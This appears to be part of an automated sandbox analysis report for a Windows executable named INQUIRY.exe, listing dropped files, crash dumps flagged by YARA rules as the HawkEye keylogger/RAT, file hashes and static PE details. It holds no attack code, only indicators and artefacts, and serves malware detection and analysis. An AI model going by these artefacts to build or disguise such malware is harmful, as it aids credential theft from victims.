                                                                      SHA-512:BE3CA69E21A0B60EDA1C09659DF6968ADA039FC12791ED077D5E1026E587C40DED3E4FD91A75BAEEE238633622C31D183F440CC241D58E08FF789477FB409854
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6231.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5644
                                                                      Entropy (8bit):3.725672845251971
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3i4W6hn/OY6TYZtuvUubSfaQgsB+aM1jM1fohm:Rrl7r3GLNi4W6h/OlTYZtuvUubS7+p1k
                                                                      MD5:0EF540DE4DBDF43FBCFEE50AB55FA136
                                                                      SHA1:7ECED9AE0FCF5AAC17BF09D4114C09D2285FC38E
                                                                      SHA-256:8DAEF505D2FE71360A1544D35C3E1ACBE7AE5A4EFF9617AC844B591E55E9DCB1
                                                                      SHA-512:9C771D8C01F602E3732F32990596ED9C8E833AF86C91F507D402CF14B1E5DEBEE53BA9CED202C1BB40F667B4DDB904AB419A4387464F30E5F72D93F60D639D4D
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6389.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.456846137432615
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8B48fm8M4JFKg7F98+q8v5epJP6v4Hdd:uITfS4aSN3JFKDKovP6vMdd
                                                                      MD5:2ABC6F088DE2C790C718E4B5C042A11F
                                                                      SHA1:663A6B84DE9F3B0284CB8F8F56F68836D59199BA
                                                                      SHA-256:B78C0C1912AF53D5A3855576A4F1759E27E916D0CDDEA8F9ECD6B179302BB31D
                                                                      SHA-512:2145C163BEF734A90F38DB9ABF56E6EDA5BB1E3CE77AC22F5ABE411C4E98191C4DC8B68588BEE18AA157139F546DECF73A2322C7C2326BFDF2870B94A3638C26
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:03:43 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7022802
                                                                      Entropy (8bit):4.717144579527239
                                                                      Encrypted:false
                                                                      SSDEEP:98304:XYPlBtHP569HBpwU1r+VTnb1XaFA8nPtYT3bMriGfjTsXDaIoUL8Md:X6Btx69HAV4YQhfsXb
                                                                      MD5:FEAD06C9C1479F402088C5790CB54810
                                                                      SHA1:98E6C5DBB08872323131736E654FA53615B587B4
                                                                      SHA-256:E5C77118B53DF48454D8706ADB3AA5E603848B19056510A90343E9C8229EEBC6
                                                                      SHA-512:BC34879B56421682EF50B6B1EAA7D8CE9D3120567037B8213FC36ACCAB9218CE55125A98552CF3ED34CA2D1E7D98D8F107C0F286F2345EB138C9C351491C32A4
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8867.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6324
                                                                      Entropy (8bit):3.732480537668084
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNi4Z6mY0uuS8+prI89bkcsfrsm:RrlsNi+6mYPuSFkvf1
                                                                      MD5:443C182B00527E31B1E4AD64BFFA8241
                                                                      SHA1:F1D745B2744B4224FD43AE752DAA83B8E7FB10E8
                                                                      SHA-256:25D2AD246A4ACEB2DBF6DD75A5DD3B06CC824F525D990939B860A4E259E71E64
                                                                      SHA-512:36978C6151C7001BF4AF5C4D7AB4510EADD05EB048E435BD1C1A61809B4003CB2F6D5AE7F6C9074952C5C121C793F337EF2886D30FE662B18BA622FFE1E1E029
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8933.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.5076470925802195
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8Bn8fm8M4JOWjZFz+q89z8pJP6v4Hud:uITfS4aSN+JOgns8vP6vMud
                                                                      MD5:52FC903ED30F5B61BA8F727424907241
                                                                      SHA1:40816AF32399226225A46FA9841CC819A894B75A
                                                                      SHA-256:CD4FF732AB018C9AAC4D92F681006C0FB246283D3ADC6A040F8CA7B31F48FF38
                                                                      SHA-512:51706A5090F26418194DFC10146F7D906A7E4E203FFDBE7BFB1FDE179C53FAE6B32AE0134F083A50E07B78FA3B020A968C9CA773CCA4A45A8FEB8AEC48BAAC8B
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER89A3.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5644
                                                                      Entropy (8bit):3.727574879681056
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3iGQA6pOPYZtuvUubSfaQgsB+aM1YC1fYAUom:Rrl7r3GLNiG/6pAYZtuvUubS7+p1YC1S
                                                                      MD5:B3060F69B30CC0B7BE8A0EEBBC0F66AE
                                                                      SHA1:14ED5EC297764359163C1F4AF27BA5D9CD96F73B
                                                                      SHA-256:E42AE8026F9C077C31416C917B6B9EBE48907C17E9D392B0B900FA94CB1F7121
                                                                      SHA-512:514FE1126AF8F28F5A2E99DD6D8B441CC185879EF3FC73AEE025356DDCA920109D43E26E994BC43E62AB9A15A0181FFDCA346ACE6F14CC4ED7A1B5B915B25D2D
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B0B.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.456792166327963
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsBJgtWI9OK6oWSC8BN8fm8M4JFKg7Fi+q8v5mpJP6v4HcHOd:uITfT4aSNwJFK7K0vP6vMiOd
                                                                      MD5:18F66061D1D492E5837EDA572C603EF7
                                                                      SHA1:09D9099E03FF5F8A1A481E9C16C706253EF312C8
                                                                      SHA-256:40F6DA190C8F79EA3E49E49A4FF2165C43FDFA39C281EE54BEC83B22ABAD4810
                                                                      SHA-512:2D7BF15CE4CD127233CDF94E19D653B90D9E3CE4AA6DE49D145DC879CF3F7B4559D16F1D2B3118FAD5B7CE89279EB44B69F85F037D125FEB27E82BAAA80C3B97
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:02:53 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7023137
                                                                      Entropy (8bit):4.716145709461237
                                                                      Encrypted:false
                                                                      SSDEEP:98304:XYElKgNP5N9H5ZFx1r+VTJb1XacA8nLqYT3bXUyYjgtXSiqjoUt8MS:XbKgjN9HVsvVrttXS+
                                                                      MD5:727EDE66BE753BF43CC3BB8AD0424846
                                                                      SHA1:6D36C62C3F02AC08483F5C46ECAE760987320DCF
                                                                      SHA-256:790BA9AF55C3D758F27EF0D7863D6CB9A56EAFA041302FF6E05DD97CF97AC35F
                                                                      SHA-512:E96B87EEFC7CD22C841C78A61B34466AD208935E6ACAA741204F87FBBFCADA9B9EF12B6E3C4E9379491B5A6BEED83DA044D60F1774519197CFF5A50636035656
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... ........)._!..................U...........B.......8......GenuineIntelW...........T...........z)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3AF.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6324
                                                                      Entropy (8bit):3.7341230330284576
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNiGR6OjGY0uuS8+prm89bkasfCCsm:RrlsNiY6DYPuS/k5fCo
                                                                      MD5:5D356EEFFF6F12474642A2400398FCD4
                                                                      SHA1:51D9FB907FDCABE46A83942DF50444C241FC8F63
                                                                      SHA-256:53E30E0481710B622CD95CFADFD2017035084D91E8EFDF6D2BF3EEDF642EF4F5
                                                                      SHA-512:B33ACA3565A56D25A75FB3D09CF4E818502C92DA36C13E3277076147DC05F9D9BEF1AAFFCD81E0A2F4831560579BAB3E2688DCB4EC723064BA3576CBEF39A17E
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6808</Pid>
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6FC.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.511253263073843
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsBJgtWI9OK6oWSC8BF8fm8M4JOWjZFI+q89zApJP6v4HcHdd:uITfT4aSNkJOgEsAvP6vMidd
                                                                      MD5:4433E23608B8B2A3855C267846E81EA3
                                                                      SHA1:20A828E188264B443EC9BF44921A81DADFD4B472
                                                                      SHA-256:9632AC9115185AB53965AF43D06F0E22DC58CA6013D9DC82F82F636370757E73
                                                                      SHA-512:14C33EF3DA14C74ECEF7CDF5F79CA7C7F89415E714E06A2A5AC643B10BCE2714A44370694F8A69FC241D9547D50101F973E37CB27121CC454DD6865C33B7F751
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):7616
                                                                      Entropy (8bit):3.691270032301233
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNiin6E6YPb6EgmfZtuvUubS7+p1ct1fAldUm:RrlsNia6E6Yj6EgmfSvvbSecvfer
                                                                      MD5:ACACA69C6A291286C08D46EDABFF5680
                                                                      SHA1:D7B1662B910D8FD7961E37DB9E444921E4639EA4
                                                                      SHA-256:8EEB4DDDCF0548A987BD4BF9FE0C06E0B2C14C390D2F0F99C49CD1C5C541F745
                                                                      SHA-512:A9EB6EE1080F61332325FA1A47A26C6351A3A070B88DDBBE280D70D3C6BE4BE18E3063E83954C8949A6236C251A3B2BD52CA3176A609F3F4C916890330EDEA01
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5896</Pid>
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFF4.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.455540365553958
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zs6JgtWI9OK6oWSC8Bv8fm8M4JFKg7Fflm+q8v5UpJP6v4Hwd:uITfI4aSNCJFKcIKGvP6vMwd
                                                                      MD5:DF582E1905AE5003E6954E4AD881502D
                                                                      SHA1:CA58F2D441FEA0F0EDB1918239EA99A9E579DE90
                                                                      SHA-256:DA6CA008EF7A7B3630E4B663CB2A6E8CE38BCC4E32E7E416950FAB100EA1F2FB
                                                                      SHA-512:5BC1A1740FC49FB50052C08845A89BFC11D4B87A83AA0B5BFEFC4682A1F9C36F7F26548BF608BF22B78BE23A721C9620E4B2A1D917BF588FF7A2DBE285F716CF
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734352" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2
                                                                      Entropy (8bit):1.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Qn:Qn
                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                      Malicious:false
                                                                      Preview: ..
                                                                      C:\Users\user\AppData\Roaming\pid.txt
                                                                      Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):2.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Pd:F
                                                                      MD5:EFFC299A1ADDB07E7089F9B269C31F2F
                                                                      SHA1:6AFB24DE207D2E6952BA43F0E5B20BCDF0596CE5
                                                                      SHA-256:50E9A8665B62C8D68BCCC77C7C92431A1AA26CCBD38ED4BBA8DD7422A3A4AB70
                                                                      SHA-512:BD27269F95DA0217EE0999E12CC2AFC05882C559D55C1660095BB38A7D96ECB5F8210A919B24069C3FCC17CCDAA13844A75948314C74AAAC63B082DF196EA818
                                                                      Malicious:false
                                                                      Preview: 1364
                                                                      C:\Users\user\AppData\Roaming\pidloc.txt
                                                                      Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):34
                                                                      Entropy (8bit):4.0989440037669045
                                                                      Encrypted:false
                                                                      SSDEEP:3:oNt+WfWsrmC:oNwvsr7
                                                                      MD5:4FA80C1B433C83F339F774D6347C74D8
                                                                      SHA1:B5F7CA62EFB43F9A32A112C991CE22C07A8908D2
                                                                      SHA-256:25E8C1425C844373EBE82F274167A8ADEA6581F5A4F3ABC6B5F4BD0E5AE80092
                                                                      SHA-512:514421997E148C08C2BEE3664F660BEAA500881D1683F2DC6680DA7B5038857A941691871129564402768970E4463883C17A3CB186B1CCB0DE82714633B7EECF
                                                                      Malicious:false
                                                                      Preview: C:\Users\user\Desktop\INQUIRY.exe

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.893502354967658
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      File name:INQUIRY.exe
                                                                      File size:1009664
                                                                      MD5:0b940145d7d02e5b1b975c99dd5197a4
                                                                      SHA1:53ae0b576f7b362b90a25ace1470d33068db4490
                                                                      SHA256:bf487ff7cdbbd998b633b1858a939d8c808bcce65ab9937695475b39deea70a8
                                                                      SHA512:f6ea131ca86752edd8163c27ba045ff8ab4fe90a92f923565496e99d8b46ba5e99af14660bcca127a1ff06246ca262456508f6f9de2462e4cd10ba53d1428a92
                                                                      SSDEEP:12288:Hl1aMljBMKnw6WJoGPb5FUoRAVyImHlawG0h/XWl2l+klp8OdH+0YxEGIN1QpZrj:jJCKxWfPNFwyIUlawt/3mwe0dn1QT
                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:60c8d86cece67c70

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x479884
                                                                      Entrypoint Section:CODE
